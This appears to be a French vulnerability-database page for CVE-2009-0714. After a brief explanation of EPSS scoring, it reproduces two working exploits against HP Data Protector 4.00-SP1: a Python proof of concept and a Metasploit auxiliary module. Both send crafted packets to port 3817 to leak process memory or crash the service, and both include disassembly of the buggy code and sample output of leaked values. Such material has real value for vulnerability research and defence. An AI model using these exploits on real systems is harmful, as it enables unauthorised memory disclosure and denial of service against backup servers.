CVE-2009-0714 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/usr/bin/env python #POC Memory disclosure/ Denial Of Service #HP Data protector 4.00-sp1 43064 #Tested for Windows Version Only ''' Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80 100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754] 100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598] 100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data 100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset 100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak 100DDEA3 83C4 1C ADD ESP,1C 100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI ''' import socket import sys import struct import time import getopt bf = ("\x54\x84\x00\x00" + "\x00\x00\x00\x00" + "\x06\x00\x00\x00" + "\x92\x00\x00\x00" + "data") ip = '192.168.0.14' port = 3817 addr = (ip,port) mem_addr = 0x7ffdf000 #PEB for windows DEBUG = False def exploit_memory(ip_addr,read_mem): s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip_addr,port)) reqst = bf.replace("data","A"*130) #t = ((addr-1022AC80)/4 - 4) t = ((read_mem-0x1022A4F0)/4 - 4) print "0x%x" % t reqst = reqst[0:32] + struct.pack("<L",t) + reqst[36:] s.send(reqst) resp = s.recv(1000) leak = struct.unpack("<L",resp[32:36]) #print type(leak[0]) if DEBUG: print "Len of resp: %d" % len(resp) for i in range(0,len(resp)): if i % 16 ==0: print print "0x%02x" % struct.unpack("<B",resp[i]), print s.close() return leak[0] def dos_yosemite(ip_addr): print "[*] Sending DOS Exploit." s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((ip_addr,port)) reqst = bf.replace("data","A"*130) s.send(reqst) #resp = s.recv(1000) s.close() def main(): try: opt, args = getopt.getopt(sys.argv[1:],"ht:e:",["help","target=","exploit="]) if len(opt)==0: usage() sys.exit(0) except getopt.GetoptError,err: print str(err) usage() sys.exit(2) for o,a in opt: if o in ("-h","--help"): usage() sys.exit() elif o in ("-e","--exploit"): for opt_target,arg_target in opt: if opt_target in ("-t","--target"): if int(a) == 0: # DoS dos_yosemite(arg_target) sys.exit(0) elif int(a) == 1: print "[*] Dumping Memory..{PEB}" for i in range(0,int(0x50),4): #Poc to read the 80bytes from memory leak = exploit_memory(arg_target,mem_addr+i) time.sleep(0.5) print "0x%08x ---> 0x%08x" % ((mem_addr+i),leak) sys.exit() else: print "[*] Unknown Exploit type" usage() sys.exit() else: print "[*] Target Missing" usage() sys.exit() else: continue def usage(): print "Yosemite DoS and Information Disclosure Exploit" #print "Yosemite backup standard v8.7 build 43905 Trial" #print "Tested for Windows Versions" print "Available Options" print "\t -t | --target target address" print "\t -e | --exploit { 0 - Dos \ 1 - Memory Leak }" print "\n" if __name__=='__main__': main() ''' C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 1 [*] Dumping Memory..{PEB} 0x7ffdf000 ---> 0x0012fbc4 0x7ffdf004 ---> 0x00130000 0x7ffdf008 ---> 0x0012d000 0x7ffdf00c ---> 0x00000000 0x7ffdf010 ---> 0x00001e00 0x7ffdf014 ---> 0x00000000 0x7ffdf018 ---> 0x7ffdf000 0x7ffdf01c ---> 0x00000000 0x7ffdf020 ---> 0x00000c54 0x7ffdf024 ---> 0x00000cfc 0x7ffdf028 ---> 0x00000000 0x7ffdf02c ---> 0x00000000 0x7ffdf030 ---> 0x7ffdb000 0x7ffdf034 ---> 0x00000000 0x7ffdf038 ---> 0x00000000 0x7ffdf03c ---> 0x00000000 0x7ffdf040 ---> 0xe15b42a0 0x7ffdf044 ---> 0x00000000 0x7ffdf048 ---> 0x00000000 0x7ffdf04c ---> 0x00000000 C:\pocs>python poc_yosemite.py -t 192.168.0.14 -e 0 [*] Sending DOS Exploit. ''' # milw0rm.com [2009-06-23]

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'HP Data Protector 4.00-SP1 Build 43064 Memory leak and DoS', 'Description' => %q{ HP Data Protector is prone to a memory leak vulnerability. The same vector of exploitation can be used for denial of service attack if an invalid memory address is accessed. }, 'Author' => [ 'Nibin' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: ???? $', 'References' => [ [ 'URL', 'http://ivizsecurity.com/security-advisory-iviz-sr-09002.html' ], [ 'CVE', 'CVE-2009-0714' ], ], 'DisclosureDate' => 'May 13 2009')) register_options( [ Opt::RPORT(3817), OptString.new('MEMORY', [ false, 'The starting address of memory', '0x7ffdf000']), OptString.new('SIZE', [false,'The size of memory to leak (in Bytes)',80]), OptString.new('DoS', [false,'Enable or Disable DoS mode',false]), ], self.class) end def run data = "\x54\x84\x00\x00" data += "\x00\x00\x00\x00" data += "\x06\x00\x00\x00" data += "\x92\x00\x00\x00" data += "x41" * 130 mem_size = datastore['SIZE'].to_i mem_addr = datastore['MEMORY'].hex if (mem_addr == 0) puts("[!] Starting memory address is zero. Setting it to PEB address (Default)") mem_addr = "0x7ffdf000".hex end if (mem_size < 0) puts("[!] Memory size is negative. Setting it to default") mem_size = 80 end if (!datastore['DoS']) offset = 0 print_status("Starting Memory Address: 0x#{mem_addr.to_s(16)} ") while (offset < mem_size) connect t = ( ( ( ( mem_addr + offset ) - 0x1022A4F0 ) / 4 ) - 4 ) pkt = data[0,32] + ([t].pack('V')) + data[36,110] sock.put(pkt) sleep(1) res = sock.get_once leak = res[32,4].unpack('V') puts "[*] Leaking Memory: 0x#{(mem_addr + offset).to_s(16)} -> 0x%x" % [leak.to_s] offset +=4 disconnect end else print_status("Sending evil packet") pkt = data connect sock.put(pkt) disconnect end end end =begin Buggy code @dpwinsup module of dpwingad process running at 3817/TCP port dpwinsup.10275F80 100DDE89 8B15 54A72210 MOV EDX,DWORD PTR DS:[1022A754] 100DDE8F 8B82 98650000 MOV EAX,DWORD PTR DS:[EDX+6598] 100DDE95 8B4C24 54 MOV ECX,DWORD PTR SS:[ESP+54] ;ECX = user controlled data 100DDE99 8D1481 LEA EDX,DWORD PTR DS:[ECX+EAX*4] ;EDX = if invalid/valid offset 100DDE9C 8B3495 F0A42210 MOV ESI,DWORD PTR DS:[EDX*4+1022A4F0] ;Crash/Memory Leak 100DDEA3 83C4 1C ADD ESP,1C 100DDEA6 897424 10 MOV DWORD PTR SS:[ESP+10],ESI n@n-laptop:/mnt/projects/metasploit$ ./msfcli auxiliary/admin/dataprotector/hp_dataprotector RHOST=172.16.145.129 MEMORY=0x7ffdf000 E [*]Please wait while we load the module tree... [*] Starting Memory Address: 0x7ffdf000 [*] Leaking Memory: 0x7ffdf000 -> 0x12fbc4 [*] Leaking Memory: 0x7ffdf004 -> 0x130000 [*] Leaking Memory: 0x7ffdf008 -> 0x12d000 [*] Leaking Memory: 0x7ffdf00c -> 0x0 [*] Leaking Memory: 0x7ffdf010 -> 0x1e00 [*] Leaking Memory: 0x7ffdf014 -> 0x0 [*] Leaking Memory: 0x7ffdf018 -> 0x7ffdf000 [*] Leaking Memory: 0x7ffdf01c -> 0x0 [*] Leaking Memory: 0x7ffdf020 -> 0x674 [*] Leaking Memory: 0x7ffdf024 -> 0xa8 [*] Leaking Memory: 0x7ffdf028 -> 0x0 [*] Leaking Memory: 0x7ffdf02c -> 0x0 [*] Leaking Memory: 0x7ffdf030 -> 0x7ffd5000 [*] Leaking Memory: 0x7ffdf034 -> 0x0 [*] Leaking Memory: 0x7ffdf038 -> 0x0 [*] Leaking Memory: 0x7ffdf03c -> 0x0 [*] Leaking Memory: 0x7ffdf040 -> 0xe20abeb0 [*] Leaking Memory: 0x7ffdf044 -> 0x0 [*] Leaking Memory: 0x7ffdf048 -> 0x0 [*] Leaking Memory: 0x7ffdf04c -> 0x0 =end # milw0rm.com [2009-06-23]